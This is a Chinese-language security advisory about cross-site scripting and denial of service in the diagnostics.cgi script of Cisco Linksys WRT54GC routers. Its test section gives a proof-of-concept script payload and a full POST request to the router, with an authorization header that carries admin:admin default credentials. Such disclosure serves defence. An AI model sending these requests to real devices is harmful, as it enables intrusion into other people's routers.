发布日期：2009-09-30
更新日期：2009-10-12

受影响系统：

Cisco Linksys WRT54GC 1.1.5
Cisco Linksys WRT54GC 1.0.7

描述：

---

BUGTRAQ  ID: 36599

Linksys WRT54GC是思科的一款小型无线路由器。

WRT54GC路由器的diagnostics.cgi脚本没有正确地验证用户所提交的HTTP请求，远程攻击者可以通过在请求中包含有恶意的ping_address和raceroute_address参数注入任意脚本代码或导致拒绝服务。

<*来源：VenturoLab
  
  链接：http://secunia.com/advisories/36921/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

“><script>alert(’Hello World!’);</script>

==========================

POST /diagnostics.cgi

…

Authorization: Basic YWRtaW46YWRtaW4=

Content-Type: application/x-www-form-urlencoded

Content-Length: 170

ping_address=%22%3E%3Cscript%3Ealert%28%27Hello+World%21%27%29%3B%3C%2Fscript%3E&packet_size=32&ping_times=4&ping=+++++Ping++++++&raceroute_address=&message=ping&MTU=1450

建议：

---

厂商补丁：

Cisco
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.cisco.com/warp/public/707/advisory.html

浏览次数：2256
严重程度：0（网友投票）